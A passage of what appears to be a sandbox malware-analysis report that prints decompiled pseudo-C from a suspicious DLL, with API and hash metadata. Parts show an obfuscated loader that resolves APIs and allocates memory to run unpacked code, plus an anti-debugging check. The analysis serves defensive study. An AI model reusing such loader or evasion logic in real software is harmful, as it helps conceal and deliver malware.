            								if( *((intOrPtr*)(_t617 + 0x18)) > 0x6d540000 ||  *((intOrPtr*)(_t617 + 0x20)) +  *((intOrPtr*)(_t617 + 0x18)) <= 0x6d540000) {
            									goto L46;
            								}
            								_t591[0x65] =  *(_t591[0x66] + 0x18);
            								 *(_t591[0x66] + 0x18) = _t591[0x10];
            								_t591[0x4c] = _t591[0x4c] +  *_t591 * 0xffffd15b;
            								_t480 = _t591[9];
            								_t591[0x24] = _t591[0x24] ^ _t480;
            								_t591[9] = _t480 - 1;
            								 *((intOrPtr*)(_t591[0x66] + 0x1c)) =  *((intOrPtr*)(_t591[0x11] + 0x28)) + _t591[0x10];
            								if(_t591[0x34] != _t591[0x24]) {
            									_t591[0x4c] = _t591[0x4c] + 0xffffd14d;
            								}
            								_t591[0x77] =  *(_t591[0x66] + 0x20);
            								_t591[9] = _t591[9] - (_t591[0x56] ^ 0x000029d1);
            								 *(_t591[0x66] + 0x20) =  *(_t591[0x11] + 0x50);
            								goto L51;
            								L46:
            								_t618 =  *(_t617 + 8);
            								_t591[0x66] = _t618;
            								if(_t618 !=  *((intOrPtr*)(_t591[0x63] + 0xc)) + 0x14) {
            									goto L42;
            								}
            								goto L51;
            							}
            						}
            						_t697 =  &(_t591[0x4c]);
            						do {
            							_t591[0x52] = _t697;
            							_t608 = _t608 + 1;
            						} while (_t608 <=  *(_t665 + 0x2c) * 0xf17697d9);
            						goto L38;
            					}
            					_t698 = VirtualAlloc(0,  *((intOrPtr*)(_t607 + 4)) -  *_t607,  *(_t591[0x14] + 0x1c) - 0x160d, 4);
            					if(_t698 == 0) {
            						_t682 =  *(_t712 + 0x5c);
            						goto L35;
            					}
            					_t591[0x3a] = _t591[0x4f] * _t591[0x3a] * 0x252e;
            					E6D508CD0(_t698,  *(_t591[0x5c]),  *((intOrPtr*)(_t591[0x5c] + 4)) -  *(_t591[0x5c]));
            					_t712 = _t712 + 0xc;
            					_t503 = _t591[0x5d]();
            					_t591[0x61] = _t503;
            					if(_t503 !=  *(_t591[2] + 0x1c) * 0xf148673b) {
            						_push(_t698);
            						_push(_t503);
            						if(_t591[0x62]() != 0) {
            							_t669 = VirtualAlloc(0, ( *(_t591[0x49] + 0x4c) ^ 0x0000224d) << 2, 0x1000,  *( *_t591 + 0x4c) * 0x3ade6314);
            							 *(_t712 + 0x28) = _t669;
            							if(_t669 == 0) {
            								L32:
            								_t682 =  *(_t712 + 0x5c);
            								_t591[0x68] =  &(_t591[0x5e]) * _t591[0x68];
            								if( *(_t591[0x75] + 0x1c) * 0x6b5b45d5 !=  *((intOrPtr*)(_t591[0x49] + 0x1c)) + 0x898) {
            									_t591[0x24] = _t591[4] * 0x2ea5;
            								}
            								goto L35;
            							}
            							if( *( *(_t591[0x5c] + 8)) != 0xffffffff) {
            								_t633 =  *(_t591[0x49] + 0x2c) ^ 0x00000d5d;
            								if(_t633 > ( *(_t591[0x1d] + 0x1c) ^ 0x00000322)) {
            									L24:
            									_t685 =  *(_t591[2] + 0x1c) * 0xd587cad0;
            									if(_t685 == 0x2c90) {
            										L28:
            										 *((intOrPtr*)(_t669 +  *( *(_t591[0x5c] + 8)) * 4)) = _t698;
            										L29:
            										_t634 =  *_t591;
            										if(_t591[0x4c] !=  *(_t634 + 0x4c) * 0xfcb704d) {
            											_t591[0x24] =  *(_t634 + 0x1a8) * 0x29b2;
            										}
            										_t591[0xc] = _t591[0xc] + _t591[0x24] - 0x1eee;
            										 *[fs:0x2c] = _t669;
            										goto L32;
            									}
            									_t635 = _t591[0x24];
            									_t532 = 0x2c90 - _t685;
            									do {
            										_t635 = _t635 ^ 0x00002ea5;
            										_t532 = _t532 - 1;
            									} while (_t532 != 0);
            									_t591[0x24] = _t635;
            									goto L28;
            								}
            								_t686 = _t591[9];
            								_t670 = _t591[0x1d];
            								do {
            									_t686 = _t686 + 0x2b78 - _t591[0x4c];
            									_t633 = _t633 + 1;
            									_t591[9] = _t686;
            								} while (_t633 <= ( *(_t670 + 0x1c) ^ 0x00000322));
            								_t669 =  *(_t712 + 0x28);
            								goto L24;
            							}
            							 *_t669 = _t698;
            							goto L29;
            						}
            						_t537 = _t591[0x24];
            						_t591[0x3a] = _t591[0x3a] + _t537;
            						_t591[0x24] = _t591[0x5a] * 0x000029d1 ^ _t537 + 0x00000001;
            						 *(_t591[0x14] + 0xd8) =  *(_t591[0x14] + 0xd8) * 0xfffffb0d;
            						_t503 = _t591[0x20] * 0xa8c4092d;
            						L14:
            						ExitProcess(_t503);
            					}
            					_t503 = _t591[7] ^ 0x0000260c;
            					goto L14;
            				}
            				if(_t682 > _t662 + 0x29b2) {
            					_t592 =  *(_t712 + 0x60);
            					_t592[0x4c] = _t592[0x4c] - (_t590 ^ 0x00001eee) + _t592[0x3e];
            					_t639 = _t592[0x20];
            					 *(_t712 + 0x24) = (_t592[0x49] ^  *(_t712 + 0x10)) & 0x000024ad;
            					_t687 = _t682 - _t592[0x12] * _t704;
            					 *(_t712 + 0x5c) = _t687;
            					 *(_t712 + 0x40) = _t662 + 0xffffd15b + _t639 - _t592[0x68];
            					_t592[0x24] = _t592[0x24] | _t592[0x3f] ^ 0x00002c90;
            					_t673 = _t592[0x5e];
            					_t592[0x20] = _t639 - _t673 * _t592[0x12];
            					 *(_t712 + 0x4c) =  *(_t712 + 0x4c) | _t592[0x22] * _t592[0x22];
            					 *(_t712 + 0x28) = _t592[0x39] & _t592[0x31];
            					_t557 =  *(_t712 + 0x60);
            					_push(_t557[0x5a] ^ ( *(_t712 + 0x60))[0x75] ^ ( *(_t712 + 0x60))[2]);
            					_push(_t557[0x40] +  *(_t712 + 0x14));
            					_t643 =  *(_t712 + 0x28);
            					_push((_t557[0x18] +  *(_t712 + 0x5c)) * _t557[9]);
            					_t678 =  *(_t712 + 0x24);
            					_push( *((intOrPtr*)(_t712 + 0x18)) + 0xffffd78e);
            					_push( *(_t712 + 0x6c) & 0x0000252e);
            					_push(_t643 ^ 0x00002ac3);
            					_push(_t692 * 0x00002ab3 | _t557[0x2f]);
            					_push( *(_t712 + 0x28) + _t678);
            					_push((_t673 - _t687) * 0x2ac3);
            					_t682 =  *(_t712 + 0x80);
            					_push((_t592[0x3a] ^  *(_t712 + 0x1c)) +  *(_t712 + 0x1c));
            					_t591 =  *(_t712 + 0x88);
            					_push(_t643 | _t682);
            					_push( *((intOrPtr*)(_t712 + 0x34)));
            					_push(0);
            					_push(_t678 ^ _t643);
            					_push(_t591);
            					_push( *(_t712 + 0x64));
            					_t704 = E6D515150();
            					_t645 = _t591[0x4f] |  *(_t712 + 0x80);
            					_t712 = _t712 + 0x40;
            					_t663 =  *(_t712 + 0x4c);
            					_t591[0x75] = _t591[0x75] ^ _t645 * 0x00002b78;
            					_t591[0x1d] = _t591[0x1d] | _t591[0x24] ^ 0x00002ac3;
            					_t591[2] = _t591[2] - (_t591[0xb] | _t663);
            					_t653 = _t591[0x49] * 0x29d1;
            					_t591[0x40] = _t591[0x40] + _t591[0x64] - (_t591[0x22] |  *(_t712 + 0x40));
            					if(_t682 > _t653) {
            						goto L9;
            					}
            					_t690 = _t591[0x36] * _t591[7];
            					_t702 = _t591[0x3e] ^  *(_t712 + 0x14);
            					_t655 = _t653 -  *(_t712 + 0x5c) + 1;
            					_t680 = _t591[0xe];
            					_t596 =  *((intOrPtr*)(_t712 + 0x18));
            					do {
            						_t680 = _t680 + _t702;
            						_t704 = _t704 * _t690;
            						 *(_t712 + 0x50) =  *(_t712 + 0x50) |  *(_t712 + 0x50) + _t596;
            						_t655 = _t655 - 1;
            					} while (_t655 != 0);
            					_t591 =  *(_t712 + 0x60);
            					_t682 =  *(_t712 + 0x5c);
            					_t591[0xe] = _t680;
            					goto L8;
            				}
            				_t591 =  *(_t712 + 0x60);
            				_t591[0x5d] = GetProcAddress(_t591[0x4a],  &(_t591[0x25]));
            				 *(_t591[0x42]) =  *(_t591[0x14] + 0x1c) ^ 0x53734a59;
            				 *((intOrPtr*)(_t591[0x14] + 0x90)) = 0x2ae7;
            				 *((intOrPtr*)(_t591[0x42] + 4)) =  *((intOrPtr*)(_t591[0x75] + 0x80)) + 0x615645c0;
            				_t591[0x42][2] =  *(_t591[4] + 0x1c) ^ 0x00655361;
            				_t585 = _t591[0x41];
            				_t591[0x2f] = _t591[0x2f] ^ _t585;
            				_t591[0x41] = _t585 - 1;
            				_t591[0xc] = _t591[2] ^ _t591[0xc] ^ 0x000028a4;
            				goto L8;
            			}

            APIs
            • GetProcAddress.KERNEL32(?,?), ref: 6D5039B2
            • GetProcAddress.KERNEL32(?,?), ref: 6D503C34
            • VirtualAlloc.KERNEL32(00000000,?,?,00000004), ref: 6D503C97
            • ExitProcess.KERNEL32 ref: 6D503CF6
            • VirtualAlloc.KERNEL32(00000000,?,00001000,?), ref: 6D503D69
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: AddressAllocProcVirtual$ExitProcess
            • String ID:
            • API String ID: 1983990664-0
            • Opcode ID: 307eadefd17e9349b8114a89b150a9f697d0e3337c30afdeac24833376fb991a
            • Instruction ID: 99beb09c118127cbcd2e6f875356200a09a4072c3b0b140a7ec0144e764ece1f
            • Opcode Fuzzy Hash: 307eadefd17e9349b8114a89b150a9f697d0e3337c30afdeac24833376fb991a
            • Instruction Fuzzy Hash: F152CB716042018FDB48CF28C5D5A96BBE5FF89304F1985BAED49CF29ADB30E941CB61
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 77%
            			E6D50BCDC(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
            				char _v0;
            				signed int _v8;
            				intOrPtr _v524;
            				intOrPtr _v528;
            				void* _v532;
            				intOrPtr _v536;
            				char _v540;
            				intOrPtr _v544;
            				intOrPtr _v548;
            				intOrPtr _v552;
            				intOrPtr _v556;
            				intOrPtr _v560;
            				intOrPtr _v564;
            				intOrPtr _v568;
            				intOrPtr _v572;
            				intOrPtr _v576;
            				intOrPtr _v580;
            				intOrPtr _v584;
            				char _v724;
            				intOrPtr _v792;
            				intOrPtr _v800;
            				char _v804;
            				intOrPtr _v808;
            				char _v812;
            				signed int _t40;
            				char* _t47;
            				intOrPtr _t49;
            				intOrPtr _t61;
            				intOrPtr _t62;
            				intOrPtr _t66;
            				intOrPtr _t67;
            				int _t68;
            				intOrPtr _t69;
            				signed int _t70;
            
            				_t69 = __esi;
            				_t67 = __edi;
            				_t66 = __edx;
            				_t61 = __ebx;
            				_t40 =  *0x6d55ce08; // 0xc2f81198
            				_t41 = _t40 ^ _t70;
            				_v8 = _t40 ^ _t70;
            				if(_a4 != 0xffffffff) {
            					_push(_a4);
            					E6D508929(_t41);
            					_pop(_t62);
            				}
            				E6D509250(_t67,  &_v804, 0, 0x50);
            				E6D509250(_t67,  &_v724, 0, 0x2cc);
            				_v812 =  &_v804;
            				_t47 =  &_v724;
            				_v808 = _t47;
            				_v548 = _t47;
            				_v552 = _t62;
            				_v556 = _t66;
            				_v560 = _t61;
            				_v564 = _t69;
            				_v568 = _t67;
            				_v524 = ss;
            				_v536 = cs;
            				_v572 = ds;
            				_v576 = es;
            				_v580 = fs;
            				_v584 = gs;
            				asm("pushfd");
            				_pop( *_t22);
            				_v540 = _v0;
            				_t25 =  &_v0; // 0x5
            				_t49 = _t25;
            				_v528 = _t49;
            				_v724 = 0x10001;
            				_v544 =  *((intOrPtr*)(_t49 - 4));
            				_v804 = _a8;
            				_v800 = _a12;
            				_v792 = _v0;
            				_t68 = IsDebuggerPresent();
            				SetUnhandledExceptionFilter(0);
            				_t36 =  &_v812; // -807
            				if(UnhandledExceptionFilter(_t36) == 0 && _t68 == 0 && _a4 != 0xffffffff) {
            					_push(_a4);
            					E6D508929(_t57);
            				}
            				return E6D508B95(_v8 ^ _t70);
            			}

            APIs
            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6D50BDD4
            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6D50BDDE
            • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 6D50BDEB
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled$DebuggerPresent
            • String ID:
            • API String ID: 3906539128-0
            • Opcode ID: 965130dae223a04ec7a3ecb38c0cb98d87020a786054902126db917e36cd9199
            • Instruction ID: bc284f373ce23fed982c1d9ac57edec90f97d1dbdb3f8cba797632ff3950ed01
            • Opcode Fuzzy Hash: 965130dae223a04ec7a3ecb38c0cb98d87020a786054902126db917e36cd9199
            • Instruction Fuzzy Hash: 3931D3759112199BCF25EF64DC88B9CBBB8BF48310F5045DAE51CA7250E7309F818F85
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E6D50A626(int _a4) {
            				void* _t14;
            				void* _t16;
            
            				if(E6D50CE0F(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
            					TerminateProcess(GetCurrentProcess(), _a4);
            				}
            				E6D50A6AB(_t14, _t16, _a4);
            				ExitProcess(_a4);
            			}

            APIs
            • GetCurrentProcess.KERNEL32(?,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000,00000001,6D508275,6D53E5F8,0000000C,6D50811E,?), ref: 6D50A647
            • TerminateProcess.KERNEL32(00000000,?,6D50A5FC,?,6D53E678,0000000C,6D50A72F,00000000,00000000,00000001,6D508275,6D53E5F8,0000000C,6D50811E,?), ref: 6D50A64E
            • ExitProcess.KERNEL32 ref: 6D50A660
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID: Process$CurrentExitTerminate
            • String ID:
            • API String ID: 1703294689-0
            • Opcode ID: 6eca7a861294104e20214979dd1c950202edb2f8e3715d95a4e31eeeba00271a
            • Instruction ID: ed85ab5965deb13364bfb0efb7466747ce2a19c02a79f1a0e628b34b3d334c63
            • Opcode Fuzzy Hash: 6eca7a861294104e20214979dd1c950202edb2f8e3715d95a4e31eeeba00271a
            • Instruction Fuzzy Hash: 4AE08C31800149AFCF05AF60CD0DF583B3AFF96286F120414FA388AA21DB39DD82CB80
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E6D50D074(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
            				intOrPtr _v8;
            				signed int _v12;
            				intOrPtr* _v32;
            				CHAR* _v36;
            				signed int _v48;
            				char _v286;
            				signed int _v287;
            				struct _WIN32_FIND_DATAA _v332;
            				intOrPtr* _v336;
            				signed int _v340;
            				signed int _v344;
            				intOrPtr _v372;
            				signed int _t35;
            				signed int _t40;
            				signed int _t43;
            				intOrPtr _t45;
            				signed char _t47;
            				intOrPtr* _t55;
            				union _FINDEX_INFO_LEVELS _t57;
            				signed int _t62;
            				signed int _t65;
            				void* _t72;
            				void* _t74;
            				signed int _t75;
            				void* _t78;
            				CHAR* _t79;
            				intOrPtr* _t83;
            				intOrPtr _t85;
            				void* _t87;
            				intOrPtr* _t88;
            				signed int _t92;
            				signed int _t96;
            				void* _t101;
            				intOrPtr _t102;
            				signed int _t105;
            				union _FINDEX_INFO_LEVELS _t106;
            				void* _t111;
            				intOrPtr _t112;
            				void* _t113;
            				signed int _t118;
            				void* _t119;
            				signed int _t120;
            				void* _t121;
            				void* _t122;
            
            				_push(__ecx);
            				_t83 = _a4;
            				_t2 = _t83 + 1; // 0x1
            				_t101 = _t2;
            				do {
            					_t35 =  *_t83;
            					_t83 = _t83 + 1;
            				} while (_t35 != 0);
            				_push(__edi);
            				_t105 = _a12;
            				_t85 = _t83 - _t101 + 1;
            				_v8 = _t85;
            				if(_t85 <= (_t35 | 0xffffffff) - _t105) {
            					_push(__ebx);
            					_push(__esi);
            					_t5 = _t105 + 1; // 0x1
            					_t78 = _t5 + _t85;
            					_t111 = E6D50B523(_t85, _t78, 1);
            					_pop(_t87);
            					__eflags = _t105;
            					if(_t105 == 0) {
            						L6:
            						_push(_v8);
            						_t78 = _t78 - _t105;
            						_t40 = E6D5102BB(_t87, _t111 + _t105, _t78, _a4);
            						_t120 = _t119 + 0x10;
            						__eflags = _t40;
            						if(__eflags != 0) {
            							goto L9;
            						} else {
            							_t72 = E6D50D2B3(_a16, _t101, __eflags, _t111);
            							E6D50B3FE(0);
            							_t74 = _t72;
            							goto L8;
            						}
            					} else {
            						_push(_t105);
            						_t75 = E6D5102BB(_t87, _t111, _t78, _a8);
            						_t120 = _t119 + 0x10;
            						__eflags = _t75;
            						if(_t75 != 0) {
            							L9:
            							_push(0);
            							_push(0);
            							_push(0);
            							_push(0);
            							_push(0);
            							E6D50BEB6();
            							asm("int3");
            							_t118 = _t120;
            							_t121 = _t120 - 0x150;
            							_t43 =  *0x6d55ce08; // 0xc2f81198
            							_v48 = _t43 ^ _t118;
            							_t88 = _v32;
            							_push(_t78);
            							_t79 = _v36;
            							_push(_t111);
            							_t112 = _v332.cAlternateFileName;
            							_push(_t105);
            							_v372 = _t112;
            							while(1) {
            								__eflags = _t88 - _t79;
            								if(_t88 == _t79) {
            									break;
            								}
            								_t45 =  *_t88;
            								__eflags = _t45 - 0x2f;
            								if(_t45 != 0x2f) {
            									__eflags = _t45 - 0x5c;
            									if(_t45 != 0x5c) {
            										__eflags = _t45 - 0x3a;
            										if(_t45 != 0x3a) {
            											_t88 = E6D510310(_t79, _t88);
            											continue;
            										}
            									}
            								}
            								break;
            							}
            							_t102 =  *_t88;
            							__eflags = _t102 - 0x3a;
            							if(_t102 != 0x3a) {
            								L19:
            								_t106 = 0;
            								__eflags = _t102 - 0x2f;
            								if(_t102 == 0x2f) {
            									L23:
            									_t47 = 1;
            									__eflags = 1;
            								} else {
            									__eflags = _t102 - 0x5c;
            									if(_t102 == 0x5c) {
            										goto L23;
            									} else {
            										__eflags = _t102 - 0x3a;
            										if(_t102 == 0x3a) {
            											goto L23;
            										} else {
            											_t47 = 0;
            										}
            									}
            								}
            								_t90 = _t88 - _t79 + 1;
            								asm("sbb eax, eax");
            								_v340 =  ~(_t47 & 0x000000ff) & _t88 - _t79 + 0x00000001;
            								E6D509250(_t106,  &_v332, _t106, 0x140);
            								_t122 = _t121 + 0xc;
            								_t113 = FindFirstFileExA(_t79, _t106,  &_v332, _t106, _t106, _t106);
            								_t55 = _v336;
            								__eflags = _t113 - 0xffffffff;
            								if(_t113 != 0xffffffff) {
            									_t92 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
            									__eflags = _t92;
            									_t93 = _t92 >> 2;
            									_v344 = _t92 >> 2;
            									do {
            										__eflags = _v332.cFileName - 0x2e;
            										if(_v332.cFileName != 0x2e) {
            											L36:
            											_push(_t55);
            											_t57 = E6D50D074(_t79, _t93, _t106, _t113,  &(_v332.cFileName), _t79, _v340);
            											_t122 = _t122 + 0x10;
            											__eflags = _t57;
            											if(_t57 != 0) {
            												goto L26;
            											} else {
            												goto L37;
            											}
            										} else {
            											_t93 = _v287;
            											__eflags = _t93;
            											if(_t93 == 0) {
            												goto L37;
            											} else {
            												__eflags = _t93 - 0x2e;
            												if(_t93 != 0x2e) {
            													goto L36;
            												} else {
            													__eflags = _v286;
            													if(_v286 == 0) {
            														goto L37;
            													} else {
            														goto L36;
            													}
            												}
            											}
            										}
            										goto L40;
            										L37:
            										_t62 = FindNextFileA(_t113,  &_v332);
            										__eflags = _t62;
            										_t55 = _v336;
            									} while (_t62 != 0);
            									_t103 =  *_t55;
            									_t96 = _v344;
            									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
            									__eflags = _t96 - _t65;
            									if(_t96 != _t65) {
            										E6D50FE70(_t79, _t106, _t113, _t103 + _t96 * 4, _t65 - _t96, 4, E6D50CECC);
            									}
            								} else {
            									_push(_t55);
            									_t57 = E6D50D074(_t79, _t90, _t106, _t113, _t79, _t106, _t106);
            									L26:
            									_t106 = _t57;
            								}
            								__eflags = _t113 - 0xffffffff;
            								if(_t113 != 0xffffffff) {
            									FindClose(_t113);
            								}
            							} else {
            								__eflags = _t88 -  &(_t79[1]);
            								if(_t88 ==  &(_t79[1])) {
            									goto L19;
            								} else {
            									_push(_t112);
            									E6D50D074(_t79, _t88, 0, _t112, _t79, 0, 0);
            								}
            							}
            							__eflags = _v12 ^ _t118;
            							return E6D508B95(_v12 ^ _t118);
            						} else {
            							goto L6;
            						}
            					}
            				} else {
            					_t74 = 0xc;
            					L8:
            					return _t74;
            				}
            				L40:
            			}

            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID: .
            • API String ID: 0-248832578
            • Opcode ID: fe7bb02aea30fd3068c5640ecc91d67cc2059b3c6f24a3adab482221b4cdbd10
            • Instruction ID: 414a392c0203ff1785561229da23dc31599e0806761fd2670da8d3f83d54cd48
            • Opcode Fuzzy Hash: fe7bb02aea30fd3068c5640ecc91d67cc2059b3c6f24a3adab482221b4cdbd10
            • Instruction Fuzzy Hash: D7310A7190420AAFCB18CE78CC94EFBBBBDDFC6314F154599E918D7A41EA309E458B50
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E6D5116E2(long _a4, signed int* _a8, signed char _a12, signed int _a16, intOrPtr* _a20, unsigned int* _a24, intOrPtr _a28) {
            				signed int _t172;
            				signed int _t175;
            				signed int _t178;
            				signed int* _t179;
            				signed int _t195;
            				signed int _t199;
            				signed int _t202;
            				void* _t203;
            				void* _t206;
            				signed int _t209;
            				void* _t210;
            				signed int _t225;
            				unsigned int* _t240;
            				signed char _t242;
            				signed int* _t250;
            				unsigned int* _t256;
            				signed int* _t257;
            				signed char _t259;
            				long _t262;
            				signed int* _t265;
            
            				 *(_a4 + 4) = 0;
            				_t262 = 0xc000000d;
            				 *(_a4 + 8) = 0;
            				 *(_a4 + 0xc) = 0;
            				_t242 = _a12;
            				if((_t242 & 0x00000010) != 0) {
            					_t262 = 0xc000008f;
            					 *(_a4 + 4) =  *(_a4 + 4) | 1;
            				}
            				if((_t242 & 0x00000002) != 0) {
            					_t262 = 0xc0000093;
            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000002;
            				}
            				if((_t242 & 0x00000001) != 0) {
            					_t262 = 0xc0000091;
            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000004;
            				}
            				if((_t242 & 0x00000004) != 0) {
            					_t262 = 0xc000008e;
            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
            				}
            				if((_t242 & 0x00000008) != 0) {
            					_t262 = 0xc0000090;
            					 *(_a4 + 4) =  *(_a4 + 4) | 0x00000010;
            				}
            				_t265 = _a8;
            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 << 4) ^  *(_a4 + 8)) & 0x00000010;
            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 +  *_t265) ^  *(_a4 + 8)) & 0x00000008;
            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 1) ^  *(_a4 + 8)) & 0x00000004;
            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 3) ^  *(_a4 + 8)) & 0x00000002;
            				 *(_a4 + 8) =  *(_a4 + 8) ^ ( !( *_t265 >> 5) ^  *(_a4 + 8)) & 1;
            				_t259 = E6D511B3E(_a4);
            				if((_t259 & 0x00000001) != 0) {
            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000010;
            				}
            				if((_t259 & 0x00000004) != 0) {
            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000008;
            				}
            				if((_t259 & 0x00000008) != 0) {
            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000004;
            				}
            				if((_t259 & 0x00000010) != 0) {
            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 0x00000002;
            				}
            				if((_t259 & 0x00000020) != 0) {
            					 *(_a4 + 0xc) =  *(_a4 + 0xc) | 1;
            				}
            				_t172 =  *_t265 & 0x00000c00;
            				if(_t172 == 0) {
            					 *_a4 =  *_a4 & 0xfffffffc;
            				} else {
            					if(_t172 == 0x400) {
            						_t257 = _a4;
            						_t225 =  *_t257 & 0xfffffffd | 1;
            						L26:
            						 *_t257 = _t225;
            						L29:
            						_t175 =  *_t265 & 0x00000300;
            						if(_t175 == 0) {
            							_t250 = _a4;
            							_t178 =  *_t250 & 0xffffffeb | 0x00000008;
            							L35:
            							 *_t250 = _t178;
            							L36:
            							_t179 = _a4;
            							_t254 = (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
            							 *_t179 =  *_t179 ^ (_a16 << 0x00000005 ^  *_t179) & 0x0001ffe0;
            							 *(_a4 + 0x20) =  *(_a4 + 0x20) | 1;
            							if(_a28 == 0) {
            								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe3 | 0x00000002;
            								 *((long long*)(_a4 + 0x10)) =  *_a20;
            								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
            								_t254 = _a4;
            								_t240 = _a24;
            								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe3 | 0x00000002;
            								 *(_a4 + 0x50) =  *_t240;
            							} else {
            								 *(_a4 + 0x20) =  *(_a4 + 0x20) & 0xffffffe1;
            								 *((intOrPtr*)(_a4 + 0x10)) =  *_a20;
            								 *(_a4 + 0x60) =  *(_a4 + 0x60) | 1;
            								_t240 = _a24;
            								 *(_a4 + 0x60) =  *(_a4 + 0x60) & 0xffffffe1;
            								 *(_a4 + 0x50) =  *_t240;
            							}
            							E6D511AA4(_t254);
            							RaiseException(_t262, 0, 1,  &_a4);
            							_t256 = _a4;
            							if((_t256[2] & 0x00000010) != 0) {
            								 *_t265 =  *_t265 & 0xfffffffe;
            							}
            							if((_t256[2] & 0x00000008) != 0) {
            								 *_t265 =  *_t265 & 0xfffffffb;
            							}
            							if((_t256[2] & 0x00000004) != 0) {
            								 *_t265 =  *_t265 & 0xfffffff7;
            							}
            							if((_t256[2] & 0x00000002) != 0) {
            								 *_t265 =  *_t265 & 0xffffffef;
            							}
            							if((_t256[2] & 0x00000001) != 0) {
            								 *_t265 =  *_t265 & 0xffffffdf;
            							}
            							_t195 =  *_t256 & 0x00000003;
            							if(_t195 == 0) {
            								 *_t265 =  *_t265 & 0xfffff3ff;
            							} else {
            								_t206 = _t195 - 1;
            								if(_t206 == 0) {
            									_t209 =  *_t265 & 0xfffff7ff | 0x00000400;
            									L55:
            									 *_t265 = _t209;
            									L58:
            									_t199 =  *_t256 >> 0x00000002 & 0x00000007;
            									if(_t199 == 0) {
